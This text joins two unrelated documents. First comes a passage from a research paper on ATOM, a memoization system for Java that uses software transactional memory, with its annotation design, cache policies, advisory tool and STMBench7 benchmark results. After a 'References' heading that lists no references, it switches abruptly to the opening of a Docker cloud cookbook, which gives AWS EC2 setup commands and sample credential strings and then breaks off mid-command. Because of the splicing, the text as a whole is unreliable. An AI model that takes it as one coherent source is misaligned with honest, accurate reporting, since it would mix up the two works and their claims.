The decision to implement three caching policies was made to offer programmers an opportunity to choose which equality policy adapts better to each situation—that is, which will translate into better performance. The memoization system allows this choice to be made on a per-method basis, placing no restrictions on the caching policy used for a particular method.
5.4 Memoization strategy
The addition of new cache entries complies with the semantics defined in Section 4—that is, programmers can opt either to memoize executions that produce side-effects, or not. Hence, the MemoCache implements two memoization strategies: read-only and write-allowed. The read-only memoization strategy follows the traditional memoization behavior of disallowing executions with side-effects to be memoized, whereas the write-allowed memoization strategy caches any method execution, saving the write-set and reapplying it after a cache hit.
5.5 Parameterizing @Memo annotations
Given that the ATOM system allows for three comparison policies and two memoization strategies, the @Memo annotation may be parameterized to inform the transformation process which combination of caching policy and memoization strategy the programmer intends to use in the annotated method. Finally, we present in Listing 6 the detailed implementation of the @Memo annotation.

```java
@Retention(RetentionPolicy.CLASS)
@Target(ElementType.METHOD)
public @interface Memo {
    CachePolicyType type() default CachePolicyType.VERSION;
    MemoStrategy strategy() default MemoStrategy.READONLY;
}
```

Listing 6. Implementation of the @Memo annotation.
The attribute type accepts three possible values—VERSION, VALUE, and IDENTITY—and defines how the cache will compare values for equality—using the version of the box, the value of the box, or the object referenced, respectively. On the other hand, the attribute strategy controls how side-effects are handled by the memoization system.
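To make the parameterization concrete, the following self-contained sketch reproduces the annotation of Listing 6 and shows both the defaults and an explicit parameterization in client code. Note one deliberate deviation: the real @Memo uses CLASS retention and is consumed by the bytecode rewriter, whereas the sketch uses RUNTIME retention only so that the example can read the annotations back via reflection. The Accounts class and its methods are illustrative.

```java
import java.lang.annotation.*;

enum CachePolicyType { VERSION, VALUE, IDENTITY }
enum MemoStrategy { READONLY, WRITEALLOWED }

@Retention(RetentionPolicy.RUNTIME)   // the real annotation uses CLASS retention
@Target(ElementType.METHOD)
@interface Memo {
    CachePolicyType type() default CachePolicyType.VERSION;
    MemoStrategy strategy() default MemoStrategy.READONLY;
}

class Accounts {
    @Memo                             // defaults: VERSION caching, READONLY strategy
    long getTotalBalance() { return 0; }

    @Memo(type = CachePolicyType.VALUE, strategy = MemoStrategy.WRITEALLOWED)
    long rebalance() { return 0; }

    // Helper so the example can read the annotations back.
    static Memo memoOf(String method) {
        try { return Accounts.class.getDeclaredMethod(method).getAnnotation(Memo.class); }
        catch (ReflectiveOperationException e) { throw new RuntimeException(e); }
    }
}
```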
If parameterized with READONLY, any method execution that writes will not be memoized, whereas with WRITEALLOWED all calls to the memoized method will be cached, regardless of whether they produced memory side-effects or not, and the side-effects will be reapplied in future cache hits, if necessary. Both parameters are optional and, by default, the instrumentation tool inserts in @Memo-annotated methods a read-only cache that uses the version of the box to decide whether the value that it holds is still valid.
5.6 Improving cache searches
The complexity of the read-set validation algorithm grows linearly with the number of boxes that need to be validated and depends on the caching policy chosen. Thus, it is a potential bottleneck of the system that we would like to optimize. One way to do so is by validating a read-set only when it is strictly necessary. In a program that uses the JVSTM, the system evolves through discrete states that are tagged with the number of the transaction that committed and created the state. Combining this fact with the observation that a read-set is known to be valid at creation time and after a successful search, we decided to augment each second-level entry of the cache with a list of valid states, where we store all the system states for which the read-set is valid. This way, before validating a read-set, we first check whether the current transaction’s number is stored in the log. If so, we return the cached result; if not, we validate the read-set as usual and, if the read-set is indeed valid, we add the current transaction’s number to the log.
5.7 Memory management in the MemoCache
To control memory consumption, the MemoCache adopts two distinct approaches, one for each level of the method cache. The first level uses weak references to hold the values of the map—that is, second-level entries are only weakly referenced.
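The valid-states log of Section 5.6 amounts to a small memo on top of the validation itself. A hedged sketch follows; CacheEntry, its counter, and the stubbed validateReadSet are illustrative, not the ATOM implementation.

```java
import java.util.HashSet;
import java.util.Set;

class CacheEntry {
    private final Set<Integer> validStates = new HashSet<>();  // transaction numbers where this entry was valid
    private int fullValidations = 0;                           // full read-set walks performed (for illustration)

    CacheEntry(int creationTxNumber) {
        validStates.add(creationTxNumber);                     // valid by construction in the creating state
    }

    boolean isValid(int currentTxNumber) {
        if (validStates.contains(currentTxNumber)) return true;  // known-valid state: skip the linear walk
        fullValidations++;
        boolean ok = validateReadSet();                          // the per-box validation of Section 5.3
        if (ok) validStates.add(currentTxNumber);                // remember this state for next time
        return ok;
    }

    boolean validateReadSet() { return true; }  // stand-in for the real per-box check
    int fullValidations() { return fullValidations; }
}
```

Repeated searches within the same system state then pay one set lookup instead of a walk over the whole read-set.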
Using weak references helps control the amount of memory used by the method cache because, as specified in the Java memory model [9], weak references, unlike strong ones, do not prevent their referents from being made finalizable, finalized, and then reclaimed by the garbage collector (GC). Hence, if at a certain point in time the GC algorithm decides that it needs to free some memory, entries in the cache will be dropped, without affecting cache semantics. On the other hand, the second level of the cache, as mentioned before in Section 5.3, relies on a fixed number of entries, equal to the number of available processors, with a simple round-robin replacement policy. If a memoized method m1 calls another memoized method m2, m2’s relevant state contains the nested transaction’s read-set, whereas m1’s relevant state contains both the boxes read by m1 and by m2. If we store both relevant states in the cache, m1’s cache entry will contain a subset of boxes that correspond to an entry in m2’s cache. This replication of information is undesirable considering that read-sets are usually very large. Thus, we decided to use the runtime call hierarchy of memoized methods to compose second-level cache entries. Each cache entry now stores only the boxes that are locally read by a method and has a list of other cache entries that correspond to all the memoized methods that were called by the current method. With this new approach, m2’s relevant state remains the same, but m1’s relevant state now contains only the boxes read by m1 plus a reference to the relevant state of m2.
5.8 The memoization advisory system
As discussed in Section 2, memoization results in a performance boost only when it is faster to search the cache for a match than to reexecute the original method, and, of course, there is a cache hit.
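The weakly-referenced first level of Section 5.7 can be sketched with java.lang.ref.WeakReference. The FirstLevel class below is illustrative only; it also prunes entries whose referent has already been collected, so that a reclaimed entry simply behaves as a cache miss.

```java
import java.lang.ref.WeakReference;
import java.util.HashMap;
import java.util.Map;

class FirstLevel<K, V> {
    private final Map<K, WeakReference<V>> table = new HashMap<>();

    void put(K args, V secondLevel) {
        table.put(args, new WeakReference<>(secondLevel));   // hold the second-level entry only weakly
    }

    V get(K args) {
        WeakReference<V> ref = table.get(args);
        if (ref == null) return null;                        // never cached: miss
        V entry = ref.get();
        if (entry == null) table.remove(args);               // referent reclaimed by the GC: behaves as a miss
        return entry;
    }
}
```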
From this observation comes a crucial conclusion: Memoization may deteriorate the performance of the system if programmers memoize methods that never execute under the same state or that take less time to execute than the time it takes the memoization system to search the cache. Although fundamental, the task of maximizing system performance is difficult, error-prone, and arduous if accomplished by code inspection alone or by reasoning about the intended system behavior. This problem becomes even more complex in the case of the ATOM system because programmers need to worry not only about which methods are beneficial to memoize, but also about which memoization strategy and comparison policy is the best to use for each method. To simplify the whole selection process, we introduced the TestMemoCache class. This new type of method cache subclasses the original MemoCache and is designed to collect per-memoized-method information. Unlike the conventional MemoCache, which enforces a single memoization strategy and a single caching policy, the TestMemoCache is in fact composed of six independent MemoCache instances, one for each possible combination of memoization strategy and caching policy. Thus, upon a search request, the TestMemoCache queries each of its private MemoCache instances for a hit, collecting information about the time each took to issue a response and whether the response was a cache hit or a cache miss. Each of the six searches is done inside a transaction that is aborted as soon as the TestMemoCache collects enough information about the request. This extra work is necessary to correctly recreate the execution scenario where only one cache is used. In particular, it prevents side-effects done by write-allowed caches from influencing the outcome of subsequent searches and computations.
Independently of any combination of responses given by each of the six individual caches, a search request made to the TestMemoCache always results in a cache miss, to force the execution of the original body of the memoized method. This way, the TestMemoCache can collect the time it would take the normal version of the code to execute and compare it with the various memoized solutions. It is important to note that the time a memoized method takes to complete is equal to the time spent on the cache search, if there is a cache hit, or is equal to that time plus the time spent on executing the method’s original body and on creating the new cache entry, if the cache yielded a miss. The runtime information collected by the TestMemoCache is then saved to the file system and used as input to the MemoAdvisor class, responsible for calculating, for each combination of memoization strategy and comparison policy, the total number of cache hits and cache misses, the average execution time, and the expected speedup over the unmemoized version. This overall information is presented to the programmer divided into two sections: methods whose execution memoization is expected to accelerate, and methods where it is not. The advisory system complements this information with the combination of memoization strategy and caching policy type best suited for each memoized method. It is then up to the programmer to choose the final configuration of the system. Listing 7 shows a possible output of the MemoAdvisor with two memoized methods. Only expected average times are shown.
5.9 Extending JVSTM transactions
Our memoization implementation depends crucially on the support offered by the transactional system. More specifically, on the ability to obtain from the JVSTM the read-set and the write-set, as well as the guarantee that all memory accesses are correctly registered in the respective set. But the JVSTM was not designed with memoization in mind.
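The expected-speedup figure computed by the advisor in Section 5.8 can be estimated from the collected statistics by mixing hit and miss costs by their observed frequencies. The formula below is our reading of the text, not the exact MemoAdvisor code.

```java
class MemoAdvisor {
    // Expected cost of a memoized call: a hit pays only the cache search, while
    // a miss pays the search, the original body, and the creation of a new entry.
    static double expectedSpeedup(long hits, long misses,
                                  double searchNs, double bodyNs, double insertNs) {
        double hitRate = hits / (double) (hits + misses);
        double memoNs = hitRate * searchNs
                      + (1 - hitRate) * (searchNs + bodyNs + insertNs);
        return bodyNs / memoNs;   // relative to always executing the body
    }
}
```

A method that never hits the cache yields a speedup below 1, which is exactly the case the advisor flags as not worth memoizing.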
For example, the JVSTM uses read-only transactions as a way to eliminate the overheads of logging memory accesses when they are not relevant, whereas in the ATOM system all memory accesses are relevant, even for read-only methods. Thus, we decided to extend the already available transactions with a new type of transaction—the MemoTransaction. This choice allowed us to implement memoization-specific semantics and optimizations. Going back to the example given above, to keep all the benefits of read-only transactions and still allow correct memoization, we created read-only memo transactions that log to the read-set only when executing inside a memoized method. In concurrent environments, where multiple threads may execute simultaneously, STMs use the write-set as a buffer for the changes that a transaction wishes to make. These changes will be applied if the transactional system can guarantee that the committing transaction does not conflict with a previously committed one. In this validation process, the read-set is used to ensure that the committing transaction did not read a transactional location that another, already committed, transaction wrote. Hence, even in the simpler case where we memoize a read-only method, there are side-effects that may change the semantics of the program: All transactional methods write to the transaction’s read-set. Thus, to replicate the behavior of a memoized transactional method, besides replacing the method call with the cached result, and possibly applying the cached changes, the memoization system needs to populate the transaction’s read-set with the versioned boxes that would be read by the method if it executed normally. One observation made during early tests with the ATOM system was that it spent too much time populating the read-set to ensure correct transactional semantics and that this action was negatively influencing the performance of the memoization system, especially for methods that read a large number of versioned boxes.
Given that the information registered in the read-set is necessary only if at commit time the transaction is read-write—the JVSTM’s validation task first looks at the transaction’s write-set and uses the read-set only if the write-set is non-empty—we improved the performance of the memoization system by not populating the read-set when it is known to be unnecessary. For example, we may skip the population step after a cache hit on a top-level, read-only, memoized method, because top-level read-only transactions never fail. The problem is that, after a cache hit on a memoized method executing inside a nested transaction, populating the read-set is unnecessary only if the nested transaction is read-only, its parents are read-only, and other nested transactions that may execute in the context of this transaction are also read-only. Thus, when a nested transaction commits, it is not possible to know in advance whether the read-set will be necessary in the future or not. Because the conservative approach of populating the read-set when a memoized nested transaction commits is very inefficient (even more so in read-dominated contexts, where the frequency of read-write transactions is low), the ATOM system enforces a speculative read-only policy on memoized methods. Upon a cache hit, a promise is added to the running memo transaction regarding the values that would be added to the read-set. This promise is realized immediately if the transaction is already read-write. Otherwise, it is delayed until a future nested transaction tries to write to a box.
6. Evaluation
To evaluate the usefulness of memoization in object-oriented programs we tested the ATOM system with the STMBench7 benchmark. The data structure of the STMBench7 benchmark is similar to that used by CAD programs and consists of a set of graphs and indexes that are shared and concurrently accessed by a configurable number of threads.
We extended the default implementation of the benchmark, which is lock-based, with a new version that uses the JVSTM. The JVSTM version encapsulates each mutable field of design-library objects inside a versioned box, uses versioned box operations to access the fields, and executes each operation of the benchmark inside a transaction. In our test with the ATOM we replaced the JVSTM transactions with ATOM memo transactions. Additionally, we created a version of the benchmark, from now on referred to as “Plain”, that is the default implementation of the benchmark minus all the locks. The Plain version does not use the JVSTM and was used solely to assess the overheads of using an STM on sequential, single-threaded programs. In total, the STMBench7 benchmark implements 45 distinct operations. These operations are classified according to their category and their type. In the original benchmark, we can disable all the long traversals, all the structure modification operations, or both. We extended it to allow us to disable only the read-write long traversals, leaving active the read-only long traversals. The benchmark executes an operation by calling the method performOperation, which either reads or updates the design-object graph, depending on the operation instance on which this method is invoked. We decided to memoize only the various implementations of the method performOperation because that is where we believe memoization will yield the best performance boost. Unfortunately, many implementations of the method performOperation use random numbers to, for example, index the design-object graph. Thus, we took extra care to memoize only deterministic methods, which meant, for example, that we could not memoize structure modification operations. To select which methods to memoize, we made a first run of the benchmark with all of the 14 remaining operations annotated with the @Memo annotation and using the TestMemoCache.
This preliminary test ran for 120 seconds with all long read-write traversals and structural modifications disabled, under a read-dominated workload. We then decided to memoize all the operations that, on average, executed faster when memoized. Therefore, we memoized the operations Query2, Query5, Query6, Query7, ShortTraversal19, Traversal1, Traversal8, and Traversal9. The results for the read-write and write-dominated workloads can be found in [12].
<table>
<thead>
<tr>
<th>Query7.performOperation()</th>
<th>Memo Time</th>
<th>Normal Time</th>
<th># of Hits</th>
<th># of Misses</th>
<th>SpeedUp</th>
</tr>
</thead>
<tbody>
<tr>
<td>WRITEALLOWED_VERSION</td>
<td>561221</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
<tr>
<td>WRITEALLOWED_VALUE</td>
<td>558751</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
<tr>
<td>WRITEALLOWED_IDENTITY</td>
<td>558458</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
<tr>
<td>READONLY_VERSION</td>
<td>558149</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
<tr>
<td>READONLY_VALUE</td>
<td>558015</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
<tr>
<td>READONLY_IDENTITY</td>
<td>557800</td>
<td>8827988</td>
<td>47</td>
<td>1</td>
<td>15.83</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>ShortTraversal6.traverse(Lstmbench7/core/AtomicPart;)</th>
<th>Memo Time</th>
<th>Normal Time</th>
<th># of Hits</th>
<th># of Misses</th>
</tr>
</thead>
<tbody>
<tr>
<td>WRITEALLOWED_VERSION</td>
<td>145072</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
<tr>
<td>WRITEALLOWED_VALUE</td>
<td>137762</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
<tr>
<td>WRITEALLOWED_IDENTITY</td>
<td>136493</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
<tr>
<td>READONLY_VERSION</td>
<td>127957</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
<tr>
<td>READONLY_VALUE</td>
<td>127917</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
<tr>
<td>READONLY_IDENTITY</td>
<td>127873</td>
<td>125019</td>
<td>0</td>
<td>104</td>
</tr>
</tbody>
</table>
Listing 7. Output of the MemoAdvisor with two methods of the STMBench7 benchmark memoized. Times are in nanoseconds.
We present results for a read-dominated workload and with three possible mixes of operations: (1) all operations except long read-write traversals and structural modifications, (2) all operations except long traversals (both read-write and read-only), and (3) all operations except long traversals and structural modifications. We ran each test five times, removed both the best and the worst throughput values, and averaged the three remaining values. All tests ran for 120 seconds using 1, 2, 4, 8, and 16 threads on a dual quad-core Intel Nehalem-based Xeon E5520 with 12 GB of RAM, running Ubuntu Linux 9.04 and Java SE 1.6.0_16. The machine can run up to 8 real threads, or 16 logical threads with hyperthreading. While the tests ran, no other relevant processes were executing in the system.
6.1 Comparing the JVSTM and the ATOM
We show the STMBench7 throughput results obtained for the various mixes of operations and a read-dominated workload with the JVSTM and with the ATOM in Figure 2. These results show a clear increase in performance when using memoization. The memoized version performs better than the JVSTM in almost all scenarios, achieving the best results in the first mix of operations (shown in the leftmost graph of Figure 2), where the throughput of the system increases by a factor of 14. The first mix of operations includes long read-only traversals, which are the most computationally intensive operations in the benchmark—the maximum time to completion of long traversals is over half a second, whereas for the remaining operations it is below 9 milliseconds.
So, it makes sense that memoization gives the best results for long traversals. For the second mix of operations, as we can see in the second graph of Figure 2, for 1, 2, or 4 threads memoization continues to perform better than, or at least as well as, the JVSTM with speculative read-only transactions. The same cannot be said for 8 or 16 threads. To understand these results it is important to remember that in this second mix of operations we turned on all structural modifications. So, the state of the system is constantly changing, reducing the number of cache hits. Further, more cache misses translate directly into more operations that are not skipped and, thus, concurrently add new cache entries, generating contention in the cache. This problem with operations that change the structure of the design-object graph is confirmed by the third mix of operations. We disabled once again all structural modifications and, as we can see, the ATOM outperforms the standard solution, demonstrating clear advantages of using memoization even for operations that are not computationally demanding. With the second mix of operations, we can see a reduction in performance for both the JVSTM and the ATOM with 16 threads. This result is typical of the STMBench7 when we have more threads than available processors, because the number of conflicts rises and so does the number of restarted transactions. Overall, our solution scales well and, given that the STMBench7 benchmark traverses the object graph but performs no operations on the leaves, it is reasonable to expect better results under a more realistic test, because the unmemoized version of the system would take longer to complete each operation.
6.2 The STMBench7 Plain version
Because memoization is to be used also in single-threaded environments, where the introduction of an STM is semantically irrelevant but computationally heavy, it is important to assess whether the overhead imposed by the usage of a software transactional memory to capture internal state accesses is high enough to negate the performance benefits extractable from memoization. We show in Table 1 the throughput results for a read-dominated workload and the various operation mixes in a single-threaded environment with the Plain, the JVSTM, and the ATOM versions of the benchmark. As we can observe, using the JVSTM in single-threaded programs always results in a degradation of performance. At best, the JVSTM version of the benchmark processes half the operations per second, when compared with the non-transactional version. Hence, even though in a single-threaded environment transactions never conflict or abort, STMs introduce a significant overhead that discourages their use. The same cannot be said about the ATOM version of the benchmark: In the scenario with long read-only traversals, the ATOM is by far the best approach, improving the performance of the Plain version by a factor of 7. This result is even more impressive considering that, even for single-threaded environments, the ATOM ensures that the memo cache is accessed in mutual exclusion and that read-sets and write-sets are correctly populated and validated. As expected, in the last two mixes of operations, where the number of expensive read-only operations is low or the system state is constantly changing, the ATOM performs worse than the non-transactional version, but even in these scenarios the ATOM outperforms the JVSTM. Thus, we argue that memoization can be very useful in transactional systems as a way to reduce the overheads imposed by STMs, thereby promoting their adoption.
Memoizing methods called inside a transaction may accelerate future executions of the transaction and even reexecutions of the same transaction if the transaction conflicts and then restarts. Overall, we can conclude that when there are computationally expensive repeated read-only operations, the performance boost we obtain from using the ATOM is enough to compensate not only the time spent on cache operations, but also the overheads imposed by the use of an STM. 7. Related work Memoization has been the subject of investigation since it was first introduced in 1968. Over the years, many automatic memoization systems were introduced for programming languages such as LISP [8] or C++ [10]. Compared to previous implementations of memoization, our solution is the first automatic memoization system that allows internal state dependencies, that validates choices made by the programmers, and that incorporates memory side-effects within the memoization process. Incremental computation is a technique that captures the runtime behavior of a function and then adapts its future outputs by recomputing only the parts of the computation that changed. This is accomplished using dependence graphs [1, 5] to capture the data dependencies of computations and by finding the parts of the graph that change between function calls. Although promising, it is a work that still needs to mature. Its current formulation does not deal with concurrent systems and still lacks a mainstream language implementation. Our approach detects at runtime if a method produces side-effects. Another solution would be to do this classification statically at source code level as proposed by Franke et al. [6] or Rountev [13]. Static solutions have the advantage of introducing no runtime overheads, which is essential to obtain the best speedup possible. 
The biggest problem with static analyses is that they are conservative: a method is classified as not cacheable when there is at least one path of execution where it may cause side-effects. Xu et al. [15] also applied memoization to Java programs. They dynamically identify methods that are safe to memoize using a solution based on escape analysis and Java bytecode inspection. In their work, memoized methods may do heap reads as long as the retrieved values are reachable from the supplied arguments. They allow such behavior by “flattening” reference arguments—recursively gathering object type and primitive field values for all reachable types—and by incorporating such information into the cache key. Such a solution does not entirely solve the problem of internal state reads, because it does not account for reads of static fields, or of instance fields that influence the outcome of the method but were not received as input. For example, in the scenario described in Section 2.1.1, and implemented in Listing 1, their solution would still fail to register the appropriate relevant state. Our solution combines memoization with STMs, but Ziarek and Jagannathan [16] were the first to apply memoization in transactional environments. The aim of their work was to use memoization to prevent the reexecution of operations that do not conflict in transactional environments, as a way to accelerate forced reexecutions, and not, as we propose, as a way to speed up repeated operations. Another difference between the two works is that Ziarek and Jagannathan’s memoization system assumes that a method’s result depends solely on the list of arguments, not capturing internal state dependencies.
<table> <thead> <tr> <th>Version of the Benchmark</th> <th>Plain</th> <th>JVSTM</th> <th>ATOM</th> </tr> </thead> <tbody> <tr> <td>No read-write traversals / No structural modifications</td> <td>154</td> <td>79 (0.51)</td> <td>1131 (7.34)</td> </tr> <tr> <td>No traversals</td> <td>6291</td> <td>2311 (0.37)</td> <td>3186 (0.51)</td> </tr> <tr> <td>No traversals / No structural modifications</td> <td>7719</td> <td>3460 (0.45)</td> <td>6564 (0.85)</td> </tr> </tbody> </table> Table 1. Operations per second processed by the Plain, the JVSTM, and the ATOM versions of the benchmark, for a read-dominated workload under the three different mixes of operations and one thread. In parentheses is shown the speedup relative to the Plain version. 8. Conclusion The main goal of our work was to make memoization more appealing and appropriate to the unique characteristics of object-oriented programs. In particular, we identified the difficulty of constructing the list of relevant values for the output of a method, when this list includes the arguments of the method as well as values read from the internal state of some objects, as the major obstacle to using memoization in object-oriented systems. The fact that methods may also change the state of objects, i.e., produce memory side-effects, is an additional factor that hinders and influences the applicability of memoization in object-oriented programs. In this paper we proposed to use Software Transactional Memory to extend the applicability of memoization. Our solution is to wrap methods in transactions to obtain all the information that is needed for memoization. We described an automatic memoization tool—the ATOM system—that implements our extended memoization model for object-oriented programs in a flexible and easy-to-use way, requiring minimum knowledge from programmers. 
The ATOM system automatically captures the relevant state for a memoized method’s result, identifies side-effect-free methods that are safe to memoize, and captures memory write operations to the internal state of objects so that they can be reapplied in future reexecutions of the method, thus extending memoization even to methods that are not referentially transparent. We developed a memoization advisory tool that helps programmers find the methods that can benefit from memoization. Because the ATOM system offers three caching policies and a couple of memoization strategies, the advisory tool not only lists the methods that memoization can accelerate, but also reports the best combination of caching policy and memoization strategy to use, on a per-method basis. For now, the selection of memo methods requires programmers to memoize all the methods of the system, or at least those that they expect will execute repeated work, and then run some representative portion of the use cases of the application. In the future we intend to automate the selection process and even allow the ATOM system to turn memoization on and off in methods at runtime, adapting the system to its current workload. We can conclude from our tests that, as long as there are repeated read-only operations, the ATOM system is able to improve the performance of the underlying system in a transparent, simple, and flexible way. We have also shown that, regardless of whether the system as a whole is functionally pure, programmers can expect the same behavior and beneficial characteristics of memoization in object-oriented contexts if they adopt our STM-based solution. Because STMs already do all of the expensive work of collecting the relevant information for the memoization tool, this extended memoization approach comes for free in a system that already uses an STM.
Moreover, because it increases the performance of the system at almost no extra cost, it amortizes the upfront cost of using an STM, thereby promoting the adoption of STMs. We strongly believe that STMs have much to gain from memoization, and we intend to explore this synergy in the future. For one, memoization can be used to accelerate the reexecution of transactions that abort at the validation step. In fact, this comes for free if all transactions are memoized, and it may even allow transactions that will conflict to reach the validation step faster. Second, because memoization puts the information already being generated by STMs to an additional use, it lowers the perceived cost of constructing that information in the first place. Because the effectiveness of the ATOM system is strongly correlated with the time spent on cache operations, we intend in future work to experiment with different cache strategies. In particular, we will explore an alternative to the read-set validation algorithm that, instead of checking whether each versioned box contained in the cache is still valid, relies on an invalidation protocol that automatically removes from the cache all entries that are made invalid by a successful write to a versioned box.

Acknowledgments

We wish to thank the reviewers for all the insightful comments, which have helped us to improve the final version of the paper.

References
Docker in the Cloud: Recipes for AWS, Azure, Google, and More

Sébastien Goasguen

# Table of Contents

**Docker in the Cloud**

<table>
<thead>
<tr> <th>Section</th> <th>Page</th> </tr>
</thead>
<tbody>
<tr> <td>Introduction</td> <td>1</td> </tr>
<tr> <td>Starting a Docker Host on AWS EC2</td> <td>3</td> </tr>
<tr> <td>Starting a Docker Host on Google GCE</td> <td>7</td> </tr>
<tr> <td>Starting a Docker Host on Microsoft Azure</td> <td>9</td> </tr>
<tr> <td>Introducing Docker Machine to Create Docker Hosts in the Cloud</td> <td>11</td> </tr>
<tr> <td>Starting a Docker Host on AWS Using Docker Machine</td> <td>16</td> </tr>
<tr> <td>Starting a Docker Host on Azure with Docker Machine</td> <td>19</td> </tr>
<tr> <td>Running a Cloud Provider CLI in a Docker Container</td> <td>21</td> </tr>
<tr> <td>Using Google Container Registry to Store Your Docker Images</td> <td>23</td> </tr>
<tr> <td>Using Kubernetes in the Cloud via GKE</td> <td>26</td> </tr>
<tr> <td>Setting Up to Use the EC2 Container Service</td> <td>30</td> </tr>
<tr> <td>Creating an ECS Cluster</td> <td>33</td> </tr>
<tr> <td>Starting Docker Containers on an ECS Cluster</td> <td>37</td> </tr>
</tbody>
</table>

Introduction

With the advent of public and private clouds, enterprises have moved an increasing number of workloads to the clouds.
A significant portion of IT infrastructure is now provisioned on public clouds like Amazon Web Services (AWS), Google Compute Engine (GCE), and Microsoft Azure (Azure). In addition, companies have deployed private clouds to provide a self-service infrastructure for IT needs. Although Docker, like any software, runs on bare-metal servers, running a Docker host in a public or private cloud (i.e., on virtual machines) and orchestrating containers started on those hosts is going to be a critical part of new IT infrastructure needs. Debating whether running containers on virtual machines makes sense or not is largely out of scope for this mini-book.

Figure 1-1 depicts a simple setup where you are accessing a remote Docker host in the cloud using your local Docker client. This is made possible by the remote Docker Engine API, which can be set up with TLS authentication. We will see how this scenario is fully automated with the use of docker-machine.

In this book we show you how to use public clouds to create Docker hosts, and we also introduce some container-based services that have reached general availability recently: the AWS container service and the Google container engine. Both services mark a new trend among public cloud providers, who need to embrace Docker as a new way to package, deploy, and manage distributed applications. We can expect more services like these to come out and extend the capabilities of Docker and containers in general.

This book covers the top three public clouds (i.e., AWS, GCE, and Azure) and some of the Docker services they offer. If you have never used a public cloud, now is the time. You will see how to use the CLI of these clouds to start instances and install Docker in “Starting a Docker Host on AWS EC2” on page 3, “Starting a Docker Host on Google GCE” on page 7, and “Starting a Docker Host on Microsoft Azure” on page 9.
To avoid installing the CLI, we show you a trick in “Running a Cloud Provider CLI in a Docker Container” on page 21, where all the cloud clients can actually run in a container. While Docker Machine (see “Introducing Docker Machine to Create Docker Hosts in the Cloud” on page 11) will ultimately remove the need to use these provider CLIs, learning how to start instances with them will help you use the other Docker-related cloud services. That being said, in “Starting a Docker Host on AWS Using Docker Machine” on page 16 we show you how to start a Docker host in AWS EC2 using docker-machine, and we do the same with Azure in “Starting a Docker Host on Azure with Docker Machine” on page 19.

We then present some Docker-related services on GCE and EC2. First, on GCE, we look at the Google container registry, a hosted Docker registry that you can use with your Google account. It works like the Docker Hub but has the advantage of leveraging Google’s authorization system to give access to your images to team members, and to the public if you want to. The hosted Kubernetes service, Google Container Engine (GKE), is presented in “Using Kubernetes in the Cloud via GKE” on page 26. GKE is the fastest way to experiment with Kubernetes if you already have a Google cloud account.

To finish this chapter, we look at two services on AWS that allow you to run your containers. First we look at the Amazon EC2 Container Service (ECS) in “Setting Up to Use the EC2 Container Service” on page 30. We show you how to create an ECS cluster in “Creating an ECS Cluster” on page 33 and how to run containers by defining tasks in “Starting Docker Containers on an ECS Cluster” on page 37.

AWS, GCE, and Azure are the recognized top three public cloud providers in the world. However, Docker can be installed on any public cloud where you can run an instance based on a Linux distribution supported by Docker (e.g., Ubuntu, CentOS, CoreOS).
For instance, DigitalOcean and Exoscale also support Docker in a seamless fashion.

Starting a Docker Host on AWS EC2

Problem

You want to start a VM instance on the AWS EC2 cloud and use it as a Docker host.

Solution

Although you can start an instance and install Docker in it via the EC2 web console, you will use the AWS command-line interface (CLI). First, you should have created an account on AWS and obtained a set of API keys. In the AWS web console, select your account name at the top right of the page and go to the Security Credentials page, shown in Figure 1-2. You will be able to create a new access key. The secret key corresponding to this new access key will be given to you only once, so make sure that you store it securely. You can then install the AWS CLI and configure it to use your newly generated keys. Select an AWS region where you want to start your instances by default.

The AWS CLI, `aws`, is a Python package that can be installed via the Python Package Index (pip). For example, on Ubuntu:

```
$ sudo apt-get -y install python-pip
$ sudo pip install awscli
$ aws configure
AWS Access Key ID [**********n-mg]: AKIAIEFDGHQRTW3MNQ
AWS Secret Access Key [*********UjEg]: b4pWY69Qd+Yg1qo22wC
Default region name [eu-east-1]: eu-west-1
Default output format [table]:
$ aws --version
aws-cli/1.7.4 Python/2.7.6 Linux/3.13.0-32-generic
```

To access your instance via `ssh`, you need to have an SSH key pair set up in EC2. Create a key pair via the CLI, copy the returned private key into a file in your `~/.ssh` folder, and make that file readable and writable only by you.
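The `chmod 600` step is not optional: ssh refuses to use a private key that is readable by other users. Here is a minimal local illustration, using a throwaway placeholder file in place of the real key material returned by `aws ec2 create-key-pair`:

```shell
# Placeholder standing in for the downloaded private key
# (the real file would live in ~/.ssh, e.g. ~/.ssh/id_rsa_cookbook)
demo_key=$(mktemp)
echo "placeholder private key material" > "$demo_key"
chmod 600 "$demo_key"           # owner read/write only
stat -c '%a' "$demo_key"        # prints 600 on GNU systems
```

With any other mode (e.g., 644), ssh exits with an "UNPROTECTED PRIVATE KEY FILE" warning and ignores the key.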
Verify that the key has been created, either via the CLI or by checking the web console:

```
$ aws ec2 create-key-pair --key-name cookbook
$ vi ~/.ssh/id_rsa_cookbook
$ chmod 600 ~/.ssh/id_rsa_cookbook
$ aws ec2 describe-key-pairs
+----------------------------------------------+-----------+
||                   KeyPairs                  ||
+----------------------------------------------+-----------+
||  KeyFingerprint          |  KeyName         ||
```

Figure 1-2. AWS Security Credentials page

You are ready to start an instance on EC2. The standard Linux images from AWS now contain a Docker repository. Hence, when starting an EC2 instance from an Amazon Linux AMI, you will be one step away from running Docker (`sudo yum install docker`):

TIP: Use a paravirtualized (PV) Amazon Linux AMI, so that you can use a `t1.micro` instance type. In addition, the default security group allows you to connect via `ssh`, so you do not need to create any additional rules in the security group if you only need to `ssh` to it.

```
$ aws ec2 run-instances --image-id ami-7b3db00c --count 1 --instance-type t1.micro --key-name cookbook
$ aws ec2 describe-instances
$ ssh -i ~/.ssh/id_rsa_cookbook ec2-user@54.194.31.39
Warning: Permanently added '54.194.31.39' (RSA) to the list of known hosts.
[ec2-user@ip-172-31-8-174 ~]$
```

Install the Docker package, start the Docker daemon, and verify that the Docker CLI is working:

```
[ec2-user@ip-172-31-8-174 ~]$ sudo yum update
